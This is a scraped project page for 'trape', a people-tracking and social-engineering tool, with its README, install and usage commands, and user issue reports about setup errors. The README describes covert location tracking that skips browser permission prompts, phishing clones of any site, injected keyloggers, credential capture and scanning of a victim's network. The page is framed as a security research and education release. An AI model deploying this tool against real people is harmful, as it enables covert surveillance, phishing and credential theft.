People tracker on the Internet: OSINT analysis and research tool by Jose Pino

Overview

trape (stable) v2.0

People tracker on the Internet: Learn to track the world, to avoid being traced.


Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.

--trape header

At the beginning of the year 2018 was presented at BlackHat Arsenal in Singapore: https://www.blackhat.com/asia-18/arsenal.html#jose-pino and in multiple security events worldwide.

Some benefits

  • LOCATOR OPTIMIZATION: Trace the path between you and the target you're tracking. Each time you make a move, the path will be updated, the location of the target is obtained silently through a bypass made in the browsers, allowing you to skip the location request on the victim's side, and at the same time maintain a precision of 99% in the locator.

  • APPROACH: When you're close to the target, Trape will tell you.

  • REST API: Generates an API (random or custom), and through this you can control and monitor other Web sites on the Internet remotely, getting the traffic of all visitors.

  • PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.

    --- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.

    --- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.

    --- SPEECH: A process of audio creation is maintained which is played in the browser of the target, by means of this you can execute personalized messages in different voices with languages in Spanish and English.

  • PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; So you can publish the content of your trape server which is executed locally to the Internet, to manage hooks or public attacks.

  • CLICK ATTACK TO GET CREDENTIALS: Automatically obtains the target credentials, recognizing your connection availability on a social network or Internet service.

  • NETWORK: You can get information about the user's network.

    --- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)

    --- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.

  • PROFILE: Brief summary of the target's behavior and important additional information about your device.

    --- GPU --- ENERGY

30-session recognition

Session recognition is one of trape most interesting attractions, since you as a researcher can know remotely what service the target is connected to.

  • USABILITY: You can delete logs and view alerts for each process or action you run against each target.

How to use it

First unload the tool.

git clone https://github.com/jofpin/trape.git
cd trape
python3 trape.py -h

If it does not work, try to install all the libraries that are located in the file requirements.txt

pip3 install -r requirements.txt

Example of execution

Example: python3 trape.py --url http://example.com --port 8080

If you face some problems installing the tool, it is probably due to Python versions conflicts, you should run a Python 2.7 environment :

pip3 install virtualenv
virtualenv -p /usr/bin/python3 trape_env
source trape_env/bin/activate
pip3 install -r requirements.txt
python3 trape.py -h

HELP AND OPTIONS

user:~$ python3 trape.py --help
usage: python3 trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
                                              [-ak ACCESSKEY] [-l LOCAL]
                                              [--update] [-n] [-ic INJC]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -u URL, --url URL     Put the web page url to clone
  -p PORT, --port PORT  Insert your port
  -ak ACCESSKEY, --accesskey ACCESSKEY
                        Insert your custom key access
  -l LOCAL, --local LOCAL
                        Insert your home file
  -n, --ngrok           Insert your ngrok Authtoken
  -ic INJC, --injectcode INJC
                        Insert your custom REST API path
  -ud UPDATE, --update UPDATE
                        Update trape to the latest version

--url In this option you add the URL you want to clone, which works as a decoy.

--port Here you insert the port, where you are going to run the trape server.

--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.

--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.

--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.

--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.

--version You can see the version number of trape.

--update Option used to upgrade to the latest version of trape.

--help It is used to see all the above options, from the executable.

Disclaimer

This tool has been published educational purposes. It is intended to teach people how bad guys could track them, monitor them or obtain information from their credentials, we are not responsible for the use or the scope that someone may have through this project.

We are totally convinced that if we teach how vulnerable things really are, we can make the Internet a safer place.

Developer

This development and others, the participants will be mentioned with name, Twitter and charge.

  • CREATOR

    --- Jose Pino - @jofpin - (Security Researcher)

Happy hacking!

I invite you, if you use this tool helps to share, collaborate. Let's make the Internet a safer place, let's report.

License

The content of this project itself is licensed under the Creative Commons Attribution 3.0 license, and the underlying source code used to format and display that content is licensed under the MIT license.

Copyright, 2018 by Jose Pino


Comments
  • OSError

    OSError

    Unfortunately, I get this:

    OSError: [Errno 1] Operation not permitted: '/var/folders/xv/57736fs93jlgj5pqq5qgwxpw0000gn/T/pip-F4NCOp-uninstall/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/six-1.4.1-py2.7.egg-info'

    Thanks for any tip

    opened by Isabellle 22
  • add badge(s)

    add badge(s)

    Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

    What is Rawsec's CyberSecurity Inventory?

    An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

    • Open source: Every information is available and up to date. If an information is missing or deprecated, you are invited to (help us).
    • Practical: Content is categorized and table formatted, allowing to search, browse, sort and filter.
    • Fast: Using static and client side technologies resulting in fast browsing.
    • Rich tables: search, sort, browse, filter, clear
    • Fancy informational popups
    • Badges / Shields
    • Static API
    • Twitter bot

    More details about features here.

    Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

    Why?

    • Specialized websites: Some websites are referencing tools but additional information is not available or browsable. Make additional searches take time.
    • Curated lists: Curated lists are not very exhaustive, up to date or browsable and are very topic related.
    • Search engines: Search engines sometimes does find nothing, some tools or resources are too unknown or non-referenced. These is where crowdsourcing is better than robots.

    Why should you care about being inventoried?

    Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

    Why the badge?

    The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.

    Also we took time to inventory your tool and you are gaining visibility from that: we added your tool to our inventory to make it known now it is your turn to add the badge to your project README to help our project being known.

    Ok but...

    You should think I asked nothing to you, I don't need visibility or/and I don't like your badge: your are free not to use it.

    opened by noraj 17
  • wrong url in dashboard + js

    wrong url in dashboard + js

    Command i used to run python trape.py --url https://www.google.com --port 8080

    1. JS has double http in the .js rest api path

    (function() { var paths = [ '**http://http://**xxxx.ngrok.io/static/js/xxx', 'http://http://xxxx.ngrok.io/static/js/xxx', '**http://http://**xxxx.ngrok.io/static/js/xxxx' ]; window.gMapsApiKey = "xxxxxxxxxxxxxxxxxxxxxx"; var imported = {}; var idx = 0; loadScript(function(){ idx++; loadScript(function(){ idx++; window.serverPath = 'http://http://xxxxx.ngrok.io'; loadScript(function(){ idx++; }); }); }); function loadScript(callback){ imported = document.createElement('script'); imported.type = 'text/javascript'; imported.src = paths[idx]; imported.onload = callback; var head = document.getElementsByTagName('head')[0]; head.appendChild(imported, head); } }())

    1. In the dashboard page, there is also error in the url screenshot from 2018-11-28 22-19-23
    opened by roobandev 16
  • [x] ERROR: cannot import name JSONDecodeError

    [x] ERROR: cannot import name JSONDecodeError

    Hii,

    I'm encountering this error when running trape in Python 2.7.16+ on Kali Linux "2020.2 Kali-Rolling" I've installed all the requirements, tho.

    opened by DSRobin 13
  • Trape isn't working with Chromium version 62

    Trape isn't working with Chromium version 62

    Description I do

    python trape.py -u https://google.com -p 8080
    

    Then I got, image

    I tried to browse http://127.0.0.1:8080/google.com in Chromium V.62, but there is no logs or victims in the cPanal However, When I used the same URL in Firefox, I got logs and I can see the victim in the cPanal.

    OS ubuntu 16.04

    Browser Version 62.0.3202.62 (Official Build) Built on Ubuntu , running on Ubuntu 16.04 (64-bit)

    opened by 0xIslamTaha 13
  • Small bug fixes to make trape functional again

    Small bug fixes to make trape functional again

    Hi, great tool thank you for writing it! We made some small changes for it to work again. I know it solved our problems and think it will address a few open issues on your repo. Feel free to edit as needed. Credit goes to https://github.com/tdenisenko for the bug fixes.

    opened by jerjet 9
  • CSS is not being loaded in control panel

    CSS is not being loaded in control panel

    Hey, CSS is no being loaded while in control panel. Im wondering if the CSS path is not correct, since i dont have any "styles" folder, which is the one is searching for. Thanks in advance

    opened by GorkaAbad 9
  • ModuleNotFoundError: No module named 'httplib'

    ModuleNotFoundError: No module named 'httplib'

    λ python trape.py -h Traceback (most recent call last): File "trape.py", line 23, in from core.utils import utils # File "E:\cmder\trape\core\utils.py", line 23, in import httplib ModuleNotFoundError: No module named 'httplib'

    opened by rayy101 8
  • ¿Cuál es la versión más estable de python para trabajar en windows y Mac OS?

    ¿Cuál es la versión más estable de python para trabajar en windows y Mac OS?

    Instale la version 3.7, pero me marca unos errores de codigo en el archivo utils.py, específicamente que la función print ahora debe ir entre paréntesis, le he agregado los paréntesis y posteriormente me da error en db.py con el mensaje de que hay inconsistencia en las tabulaciones(indentación y/o espacios) del código.

    opened by chedroid 6
  • Modernize Python 2 code to get ready for Python 3

    Modernize Python 2 code to get ready for Python 3

    • Old style exceptions --> new style for Python 3
      • Python 3 treats old style exceptions as syntax errors but new style exceptions work as expected in both Python 2 and Python 3.
    • Use print() function in both Python 2 and Python 3
      • print() is a function in Python 3.
    opened by cclauss 5
  • Installation ERROR

    Installation ERROR

    Hello I'm having some trouble while installing trape (requirements have been installed) Traceback (most recent call last): File "trape.py", line 23, in from core.utils import utils # File "/home/aryan/Desktop/trape/core/utils.py", line 23, in import http.client ImportError: No module named http.client

    opened by coding-bastard 4
  • Error in generating links

    Error in generating links

    hello so I keep using it, installation is fine and everything but when it generates a link it gives it like this, and it won't get a full link in the portal as well Idk why what is the issue >-=[ Public lure: .io/instagram.com
    >-=[ Control Panel link: .io/ngrok

    opened by Axila 0
  • The client is using an unsupported version of the Socket.IO or Engine.IO protocols (further occurrences of this error will be logged with level INFO)

    The client is using an unsupported version of the Socket.IO or Engine.IO protocols (further occurrences of this error will be logged with level INFO)

    I need help I get an error like this when entering the Access key. I also don't get the link to share on the target Public lure: .io/www.google.com

    `[2022-09-20 21:12:54,064] ERROR in app: Exception on /get_title [POST]
    Traceback (most recent call last):
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/app.py", line 2525, in wsgi_app
        response = self.full_dispatch_request()
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/app.py", line 1822, in full_dispatch_request
        rv = self.handle_user_exception(e)
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask_cors/extension.py", line 165, in wrapped_function
        return cors_after_request(app.make_response(f(*args, **kwargs)))
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/app.py", line 1820, in full_dispatch_request
        rv = self.dispatch_request()
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/app.py", line 1796, in dispatch_request
        return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
      File "/home/fritssasia/htool/trape/core/stats.py", line 97, in home_get_title
        return json.dumps({'status' : 'OK', 'title' : html})
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/json/__init__.py", line 124, in dumps
        return app.json.dumps(obj, **kwargs)
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/json/provider.py", line 230, in dumps
        return json.dumps(obj, **kwargs)
      File "/usr/lib/python3.8/json/__init__.py", line 234, in dumps
        return cls(
      File "/usr/lib/python3.8/json/encoder.py", line 199, in encode
        chunks = self.iterencode(o, _one_shot=True)
      File "/usr/lib/python3.8/json/encoder.py", line 257, in iterencode
        return _iterencode(o, 0)
      File "/home/fritssasia/.local/lib/python3.8/site-packages/flask/json/provider.py", line 122, in _default
        raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable")
    TypeError: Object of type bytes is not JSON serializable`
    
    opened by fritssasia 1
  • cannot import name 'json' from 'itsdangerous' (/usr/lib/python3/dist-packages/itsdangerous/__init__.py)

    cannot import name 'json' from 'itsdangerous' (/usr/lib/python3/dist-packages/itsdangerous/__init__.py)

    hello everyone.. i got this error message.. can someone tell me how to resolve this

    cannot import name 'json' from 'itsdangerous' (/usr/lib/python3/dist-packages/itsdangerous/init.py)

    opened by darkname79 0
  • Errorno 14

    Errorno 14

    • Enter a URL to generate the lure :~> https://www.google.com - What is your port to generate the server? :~> 8080 - Successful startup, get lucky on the way! [x] ERROR: [Errno 14] Bad address: './ngrok'
    opened by parthaaaroyyy 2
Owner
Jose Pino
Hacker: Cyber security researcher recognized by big Internet companies and creator of advanced cyber-intelligence tools
Jose Pino
Expense Tracker is a very good tool to keep track of your expenseditures and the total money you saved.

Expense Tracker is a very good tool to keep track of your expenseditures and the total money you saved.

Shreejan Dolai 9 Dec 31, 2022
Research using python - Guide for development of research code (using Anaconda Python)

Guide for development of research code (using Anaconda Python) TL;DR: One time s

Ziv Yaniv 1 Feb 1, 2022
Appointment Tracker that allows user to input client information and update if needed.

Appointment-Tracker Appointment Tracker allows an assigned admin to input client information regarding their appointment and their appointment time. T

IS Coding @ KSU 1 Nov 30, 2021
Path of Exile Vendor Recipe Tracker (Chaos/Regal orb)

Path of Exile Vendor Trade Tracker Are you tired of manually keeping track of collected and missing items for farming Chaos or Regal Orbs in PoE? Me t

null 1 Nov 9, 2021
Q-Tracker is originally a High School Project created by Admins of Cirus Lab.

Q-Tracker is originally a High School Project created by Admins of Cirus Lab. It's completly coded in python along with mysql.(Tkinter For GUI)

Adithya Krishnan 2 Nov 14, 2022
A normal phoneNumber tracker made with python.

A normal phoneNumber tracker made with python.

CLAYZANE 2 Dec 30, 2021
COVID-19 case tracker in Dash

covid_dashy_personal This is a personal project to build a simple COVID-19 tracker for Australia with Dash. Key functions of this dashy will be to Dis

Jansen Zhang 1 Nov 30, 2021
Team collaborative evaluation tracker.

Team collaborative evaluation tracker.

null 2 Dec 19, 2021
Coronavirus Tracker API

Coronavirus Tracker API Provides up-to-date data about Coronavirus outbreak. Includes numbers about confirmed cases, deaths and recovered. Support mul

Francisco Laguna 1 Oct 31, 2020
Iss-tracker - ISS tracking script in python using NASA's API

ISS Tracker Tracking International Space Station using NASA's API and plotting i

Partho 9 Nov 29, 2022
I³ Tracker for Essential Open Innovation Datasets

I³ Tracker for Essential Open Innovation Datasets This repository is set up to track, version, and contribute updates to the I³ Essential Open Innovat

null 1 Feb 8, 2022
Multi View Stereo on Internet Images

Evaluating MVS in a CPC Scenario This repository contains the set of artficats used for the ENGN8601/8602 research project. The thesis emphasizes on t

Namas Bhandari 1 Nov 10, 2021
Bookmarkarchiver - Python script that archives all of your bookmarks on the Internet Archive

bookmarkarchiver Python script that archives all of your bookmarks on the Internet Archive. Supports all major browsers. bookmarkarchiver uses the off

Anthony Chen 3 Oct 9, 2022
Djangoblog - A blogging site where people can make their accout and write blogs and read other author's blogs

This a blogging site where people can make their accout and write blogs and read other author's blogs.

null 1 Jan 26, 2022
A free website that keeps the people informed about housing and evictions.

Eviction Tracker Currently helping verify detainer warrant data for middle Tennessee - via Middle TN DSA - Red Door Collective Features Presents data

Red Door Collective 7 Dec 14, 2022
NewsBlur is a personal news reader bringing people together to talk about the world.

NewsBlur NewsBlur is a personal news reader bringing people together to talk about the world.

Samuel Clay 6.2k Dec 29, 2022
An AI-powered device to stop people from stealing my packages.

Package Theft Prevention Device An AI-powered device to stop people from stealing my packages. Installation To install on a raspberry pi, clone the re

rydercalmdown 157 Nov 24, 2022
Team Curie is a group of people working together to achieve a common aim

Team Curie is a group of people working together to achieve a common aim. We are enthusiasts!.... We are setting the pace!.... We offer encouragement and motivation....And we believe TeamWork makes the DreamWork.

null 4 Aug 7, 2021
YourCity is a platform to match people to their prefect city.

YourCity YourCity is a city matching App that matches users to their ideal city. It is a fullstack React App made with a Redux state manager and a bac

Nico G Pierson 6 Sep 25, 2021